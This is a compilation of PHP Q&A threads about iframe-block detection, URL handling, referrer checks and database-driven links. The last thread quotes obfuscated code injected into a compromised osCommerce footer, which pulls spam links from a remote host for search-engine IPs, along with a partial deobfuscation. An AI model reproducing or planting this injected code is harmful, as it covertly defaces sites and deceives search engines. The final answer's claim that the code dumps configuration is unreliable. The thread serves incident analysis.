I use iframes in my news aggregation web app. While I am careful to always credit and link publishers, I also respect those who chose to block iframes (by not implementing sneaky workarounds). My question is how I can automatically detect whether iframes will be blocked, given the URL of the external page in question. So far i am using this code:
//get external html
$p = file_get_contents($this->scrape_ready_url);
//check for blocker
$pattern1 = "/window\.self.{1,10}window\.top/";
$s1 = preg_match($pattern1, $p);
//check for blocker2
$pattern2 = "/window\.top.{1,10}window\.self/";
$s2 = preg_match($pattern2, $p);
//condition response
if ($s1 === 1 || $s2 === 1) {
$this->frame = "blocked";
} else {
$this->frame = "not_blocked";
}
This works most of the time (so far), but many publishers such as yahoo use slight variations of the "self !== top" code which makes preg_match not work. I am wondering if there is any universal/general test that I can implement to know whether or not a given URL will block an iframe or not.
thanks
Related
I am trying something strange with code i just want to know weather it is possible to perform a php code like this one
<?php
$cururl= ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME));
$nexurlw = $cururl-1;
echo "$nexurlw";
?>
I have a problem in this code. My current page url is 30.php and i have a button on page "go to previous page" i want to change its url 29.php with the help of this function.
But this function echo 30 every time.
Try this :
$cururl = ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME));
$intUrl = ((int) $cururl) - 1;
$nexurlw = (string) $intUrl.'.php';
echo "$nexurlw";
Even if it happens to be true in your case (because that's the default in a raw PHP installation) there's often no direct mapping between URL locations and filesystem objects (files / directories). For instance, this question's URL is
https://stackoverflow.com/questions/68504314/how-to-get-current-webpage-name-and-echo-with-some-modification but the Stack Overflow server does not have a directory called 68504314 anywhere on its disk.
You want to build a URL from another URL, thus there's no even any benefit in having the filesystem involved, you can just gather the information about current URL from $_SERVER['REQUEST_URI']. E.g.:
$previous_page_url = null;
if (preg_match('#/blah/(\d+)\.php#', $_SERVER['REQUEST_URI'], $matches)) {
$current_page_number = (int)$matches[1];
if ($current_page_number > 1) {
$previous_page_url = sprintf('/blah/%d.php', $current_page_number - 1);
}
}
I am now using this code for facebook. "https" is active and wordpress site.
<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, 'facebook.com') != false) {
?>
DON'T SHOW ADS
<?php } else { ?>
SHOW ADS
<?php } ?>
This code works for facebook. I wanted to add twitter, but when I add twitter it doesn't work at all. I tried this.
if (strpos($ref, 'facebook.com', 'twitter.com', 't.co') != false) {
It didn't work that way. If else query or "false" is correct? How can I do it in the simplest way? If the visitor comes from Facebook, Twitter, I don't want to show ads. thanks
strpos() does not check multiple "needles" to look for. You can store them in an array
and iterate over each one individually though:
<?php
$ref = $_SERVER['HTTP_REFERER'];
$sitesWithAdsHidden = [
'facebook.com',
'twitter.com',
't.co',
];
$isHiddenSite = false;
foreach ($sitesWithAdsHidden as $site) {
if (strpos($ref, $site) !== false) {
$isHiddenSite = true;
break;
}
}
if ($isHiddenSite) {
?>
DON'T SHOW ADS
<?php } else { ?>
SHOW ADS
<?php } ?>
Note that I also changed the strpos comparison to !== because a non-strict check could lead to evaluating to false if the position is actually 0 (the start of the string).
First and foremost, directly from Wikipedia:
"The referrer field is an optional part of the HTTP request sent by the web browser to the web server."
Therefore, you should always check that the Http Referer exists in the request. You can achieve this by using !empty() or isset(), however, for future maintainability, you can also use array_diff and array_keys.
You can then also achieve this without having to iterate over an array using preg_match.
if(!array_diff(['HTTP_REFERER'], array_keys($_SERVER)))
if(preg_match('/facebook|twitter/', $_SERVER['HTTP_REFERER']))
// todo: disable adverts
You could also use the null cascading operator to reduce this to one line. Do this if you have no further checks to make from the $_SERVER global variable.
if(preg_match('/facebook|twitter/', $_SERVER['HTTP_REFERER'] ?? ''))
// todo: disable adverts
Currently I am working on a webpage where certain data from a database is being fetched and displayed to the user. This information is about certain project information and the lead partners of those projects. I want to implement a functionality where the user can click on a lead partner (link) and the link will redirect this user to another page (where the database information of all the organisations is on) BUT with a predefined search for only the organisations that are equal to the clicked lead partner link.
I found a solution on how to do this but the problem is that the solution (which i describe further below) isn't that good/efficient for multiple (128) organisations.. So the question is, do you know a better/more efficient solution to achieve this. To answer this question you probably also need some background information:
BACKGROUND INFORMATION
In the outputted database information (which is done in a table) there are several information columns/titles such as:
Project name
Organisations involved
Leader partner
Project website
And so on...
The fetching of the data is being done with a simple query where certain database columns have a specific identifier. For example, the project website columns is obviously a link, so in the query it is being done as follows: $SomeQueryVar = ("SELECT project_website as LINK FROM xxxx WHERE project_website ('$some_website') "); -- Just a short example to clarify things.
For the displaying, the data is being 'catched' like so:
if(count($SomeQueryVar)>0){
for($i=0;$i<count($SomeQueryVar);$i++){
echo "<tr>";
foreach($SomeQueryVar[$i] as $key=>$value){
echo "<td>";
$b=unserialize($value);
if($key =='LINK' && $value != NULL){
$first = true;
array_filter($b);
foreach($b as $y){
echo ''."Project website".'';
$first = false;
if(!$first) break;
}
} else {
echo $value;
}
echo "</td>";
}
echo "</tr>";
}
}
As you can see in the above code, certain database columns need other displaying as the rest. For example, links must be clickable instead of just being plain text. These 'exceptions' are being catched with the if $key ==, for the data that just needs regular displaying (plain text) there is the last else inserted that just echo's the $value.
MY FOUND SOLUTION
So regarding the question, i found out that i can create redirection links using the ?SomePage on the projects page and using this 'added link value' on the organisations page to compare it. If the link is equal, then do the specific query. But it is probably easier to paste the code here:
The 'CATCHING' part
To catch a specific lead partner is also used an identifier in my query called ORG (which stands for organisation). So here is the code where i catch the organisations table:
if($key =='ORG' && $value != NULL){
$needle = array('Brainport','Development','BRAINPORT',
'brainport','DEVELOPMENT','development');
$needle2 = array('Casa','CASA', 'casa');
if (strpos_arr($value,$needle) !== false) {
echo '<a href="http://portal.e-ucare.eu/database/organisations/?a=brainport" >'.$value.'</a>';
}
if (strpos_arr($value,$needle2) !== false) {
echo '<a href="http://portal.e-ucare.eu/database/organisations/?a=casa" >'.$value.'</a>';
}
}
In the above code i just created it for 2 organisations (brainport and casa). For this solution i used a function called strpos_arr which searches for the needle in the haystack;) So in the code above i set the needles to the names in the database where it has to create a link for. So if for example a company with the word Brainport exists in the database, this 'catcher' will see this and display the organisation and make the name clickable.
The strpos_arr function for the $needle is as follows:
function strpos_arr($value, $needle) {
if(!is_array($needle)) $needle = array($needle);
foreach($needle as $what) {
if(($pos = strpos($value, $what))!==false) return $pos;
}
return false;
}
In the redirection page the code will also catch certain links to make queries for that link -- so for the brainport link this is http://portal.e-ucare.eu/database/organisations/?a=brainport -- in the second page code this link is catched like so:
$host = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
if($host == 'portal.e-ucare.eu/database/organisations/?a=brainport')
{
$link_word = "Brainport";
$tmp = $wpdb->get_results("
SELECT
name_of_company__organization, company_location,
company_website as LINK, organisation_type,
organisation_active_in_, organisation_scope,
organisation_files as DOC
FROM
wp_participants_database
WHERE
name_of_company__organization REGEXP ('$link_word')
ORDER BY
name_of_company__organization ASC
");
}
With this solution i can do what i want, BUT like i said in the beginning, i need this for not just 2 organisations but 128!! This would mean i have to copy the catching code blocks on both pages 128 times!! This is obviously not very efficient..
So is there any more efficient way to achieve this? Sorry if it is a bit unclear but i found it quite hard to easily wright this down;)
Anyway, thank you in advance!
The firts part you can rewrite to
if($key =='ORG' && $value != NULL){
$needles = array(
'brainport'=>array('Brainport','Development','BRAINPORT','brainport','DEVELOPMENT','development'),
'casa'=>array('Casa','CASA', 'casa')
);
foreach($needles AS $nkey => $needle){
if(strpos_arr($value,$needle) !== false) {
echo "<a href='http://portal.e-ucare.eu/database/organisations/?a={$nkey}' >{$value}</a>";
}
}
}
For the second part make an array like
[EDIT]
$link_words = array(
'portal.e-ucare.eu/database/organisations/?a=brainport'=>'Brainport',
'portal.e-ucare.eu/database/organisations/?a=casa'=>'Casa',
);
then you can use
$host = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
if(!empty($link_words[$host])){
$link_word = $link_words[$host];
$tmp = $wpdb->get_results("
SELECT
name_of_company__organization, company_location, company_website as LINK, organisation_type, organisation_active_in_, organisation_scope, organisation_files as DOC
FROM
wp_participants_database
WHERE
name_of_company__organization REGEXP ('$link_word')
ORDER BY
name_of_company__organization ASC
");
}
I dont wan't reinvent wheel, but i couldnt find any library that would do this perfectly.
In my script users can save URLs, i want when they give me list like:
google.com
www.msn.com
http://bing.com/
and so on...
I want to be able to save in database in "correct format".
Thing i do is I check is it there protocol, and if it's not present i add it and then validate URL against RegExp.
For PHP parse_url any URL that contains protocol is valid, so it didnt help a lot.
How guys you are doing this, do you have some idea you would like to share with me?
Edit:
I want to filter out invalid URLs from user input (list of URLs). And more important, to try auto correct URLs that are invalid (ex. doesn't contains protocol). Ones user enter list, it should be validated immediately (no time to open URLs to check those they really exist).
It would be great to extract parts from URL, like parse_url do, but problem with parse_url is, it doesn't work well with invalid URLs. I tried to parse URL with it, and for parts that are missing (and are required) to add default ones (ex. no protocol, add http). But parse_url for "google.com" wont return "google.com" as hostname but as path.
This looks like really common problem to me, but i could not find available solution on internet (found some libraries that will standardize URL, but they wont fix URL if it is invalid).
Is there some "smart" solution to this, or I should stick with my current:
Find first occurrence of :// and validate if it's text before is valid protocol, and add protocol if missing
Found next occurrence of / and validate is hostname is in valid format
For good measure validate once more via RegExp whole URL
I just have feeling I will reject some valid URLs with this, and for me is better to have false positive, that false negative.
I had the same problem with parse_url as OP, this is my quick and dirty solution to auto-correct urls(keep in mind that the code in no way are perfect or cover all cases):
Results:
http:/wwww.example.com/lorum.html => http://www.example.com/lorum.html
gopher:/ww.example.com => gopher://www.example.com
http:/www3.example.com/?q=asd&f=#asd =>http://www3.example.com/?q=asd&f=#asd
asd://.example.com/folder/folder/ =>http://example.com/folder/folder/
.example.com/ => http://example.com/
example.com =>http://example.com
subdomain.example.com => http://subdomain.example.com
function url_parser($url) {
// multiple /// messes up parse_url, replace 2+ with 2
$url = preg_replace('/(\/{2,})/','//',$url);
$parse_url = parse_url($url);
if(empty($parse_url["scheme"])) {
$parse_url["scheme"] = "http";
}
if(empty($parse_url["host"]) && !empty($parse_url["path"])) {
// Strip slash from the beginning of path
$parse_url["host"] = ltrim($parse_url["path"], '\/');
$parse_url["path"] = "";
}
$return_url = "";
// Check if scheme is correct
if(!in_array($parse_url["scheme"], array("http", "https", "gopher"))) {
$return_url .= 'http'.'://';
} else {
$return_url .= $parse_url["scheme"].'://';
}
// Check if the right amount of "www" is set.
$explode_host = explode(".", $parse_url["host"]);
// Remove empty entries
$explode_host = array_filter($explode_host);
// And reassign indexes
$explode_host = array_values($explode_host);
// Contains subdomain
if(count($explode_host) > 2) {
// Check if subdomain only contains the letter w(then not any other subdomain).
if(substr_count($explode_host[0], 'w') == strlen($explode_host[0])) {
// Replace with "www" to avoid "ww" or "wwww", etc.
$explode_host[0] = "www";
}
}
$return_url .= implode(".",$explode_host);
if(!empty($parse_url["port"])) {
$return_url .= ":".$parse_url["port"];
}
if(!empty($parse_url["path"])) {
$return_url .= $parse_url["path"];
}
if(!empty($parse_url["query"])) {
$return_url .= '?'.$parse_url["query"];
}
if(!empty($parse_url["fragment"])) {
$return_url .= '#'.$parse_url["fragment"];
}
return $return_url;
}
echo url_parser('http:/wwww.example.com/lorum.html'); // http://www.example.com/lorum.html
echo url_parser('gopher:/ww.example.com'); // gopher://www.example.com
echo url_parser('http:/www3.example.com/?q=asd&f=#asd'); // http://www3.example.com/?q=asd&f=#asd
echo url_parser('asd://.example.com/folder/folder/'); // http://example.com/folder/folder/
echo url_parser('.example.com/'); // http://example.com/
echo url_parser('example.com'); // http://example.com
echo url_parser('subdomain.example.com'); // http://subdomain.example.com
It's not 100% foolproof, but a 1 liner.
$URL = (((strpos($URL,'https://') === false) && (strpos($URL,'http://') === false))?'http://':'' ).$URL;
EDIT
There was apparently a problem with my initial version if the hostname contain http.
Thanks Trent
I'm looking at a site that has been exploited by someone/something. The site has had a bunch of links injected into it's footer that links to pharmaceutical pitches, and who knows what else. There are/were a lot of links right at the top of the footer. I can only find these now, on the cached pages in the Yahoo index. Google is still not happy w/ the site though, and the live site does not show any links anymore. This is for a client..so I mostly know what I was told, and what I can find else wise.
I found this code at the very 'tip/top' of the footer.php (it's an OsCommerse Site):
<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m";
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = # $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>
When I view the source cached pages that have the 'Bad' links, this code fits right in where I found it in the footer.php source. A little research on google show that there are exploits out there w/ similar code.
What do you think, when I run it on my own server all I get is the echoed comment in the source only like so:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
I don't want to just hastily remove the code and say 'your good' just because it looks bad, especially because I have no immediate way of knowing that the 'bad links' are gone. BTW, the links all go to a dead URL.
You can see the bad pages still cached at Yahoo:
http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--
It seems to reference / load two URLs:
http://genshop.org/script/mask.txt
http://genshop.org/paralinks/new/3/feedroller.com.txt
It's just a spam distribution script.
For partial unobfuscation use:
print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);
here's the unobfuscated script (more or less)
it's just dumping the contents of this url onto your page
it also checks the remote_addr against a list of IPs (google, et al) to try to remain undetected.
looks like you're being attaced by genshop.com
<?php
$count="cou\156\x74"; // count
$error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
$file="\146\151l\x65"; // file
$file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
$strlen="\163\x74rle\156"; // strlen
$strpos="\163tr\160o\x73"; // strpos
$substr="su\x62\x73\164\162"; // substr
$trim="tr\151m"; //trim
ini_set(' display_errors','off');
$error_reporting(0);
$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";
$IPs = # $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
$curr_ip = $trim($ips[$i]);
if ( $curr_ip != "" ) {
if ( ($x11 = $strpos($curr_ip, "*")) !== false )
$curr_ip = $substr($curr_ip, 0,$x11);
// check visitor ip against mask list
if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
$x12 = $file_get_content($tmp_filename);
echo "$x12";
// print spam contents
}
}
}
echo $curr_ip;
}
$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>
It very much is an attempt to dump information about your running configuration. Remove it immediately.
The way it works is very complicated, and is beyond me, but its one of the first steps at hacking your site.